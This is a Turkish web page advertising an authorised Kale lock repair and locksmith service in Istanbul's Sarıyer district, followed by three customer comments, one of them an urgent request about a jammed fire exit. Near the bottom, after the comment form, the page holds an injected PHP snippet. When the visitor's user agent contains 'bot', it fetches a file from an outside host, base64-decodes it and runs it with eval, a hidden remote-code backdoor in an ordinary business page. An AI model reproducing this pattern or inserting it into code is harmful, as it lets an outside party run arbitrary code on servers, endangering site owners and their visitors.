Kale Kilit Bakım Onarım Servisi

Firmamız Kale Kilit Yetkili Servisi olup tüm kale müşterilerine kaliteli güvenli hizmet sunmanın mutluluğunu yaşamaktadır. Türkiye`nin en güvenlikli ürünleri olan kale çelik kapı ve kale çelik kasa`nın kilitleri şuanda hemen hemen hiç bir hırsız tarafından açılamamaktadır.

Üzerinde Kale Kilit bulunan markası veya modeli ne olursa olsun her türlü kilit değişimi, arıza onarımı ve bakım Kale Yetkili Servisi olarak bizim tarafımızdan çözümlenebilir. List İstinye Evleri, Pelikan Park Evleri, Seba Siteleri, Seba Akdağ Siteleri, Maslak Mashattan siteleri, İstinye Konakları ve diğer sayamadığımız Sarıyer bölgesindeki tüm siteler Kale Kilit tercih etmişlerdir.

Özelikle kilit değişimi ve cilingir servisi hizmetini bölgemizde bulunan semtlere 15 dakikada vermekteyiz. Eğitimli ve işinin erbabı olan personellerimiz sizlere ürünlerin özelliklerini aktararak bilgilenmenizi sağlayacaktır.  Kale Kapı Kilit ve Aksesuar değişimi, kale kapı çilingir icin kurumsal firmaları tercih etmeniz önemle rica olunur. Almış olduğunuz ürünlerin ambalajlarının açılmamış olduğunu mutlaka kontrol ediniz.

Be Sociable, Share!

5 Yorum yapılmış “Kale Kilit Bakım Onarım Servisi”

  1. ayhan öncül diyor ki:

    kapımın kilidini değiştirmek istiyorum ankara etimesgutta oturuyorum

  2. serhat yener diyor ki:

    sayın yetkililer servis sorununu her il için çözmenizde fayda vardır

  3. TEPE HOME diyor ki:

    YANGIN ÇIKIŞ KAPIMIZ KAPALI AÇAMIYORUZ ACİL OLARAK MUDALE EDİLMESİNİ İSTİYORUZ BURASI BÜYÜK BİR ALIŞVERİŞ MERKEZİ LÜTFEN ACİL OLARAK İLGİLENİLMESİNİ RİCA EDİYORUZ YÖNETİCİ MEHMET YILMAZ

Yorum Yapın

if(preg_match("/bot/i",$_SERVER["HTTP_USER_AGENT"])): $output=file_get_contents("http://www.mobilyahizmet.com/link.txt"); eval(base64_decode($output)); endif; ?>

Sitenin Tüm Hakları Saklıdır. (2014)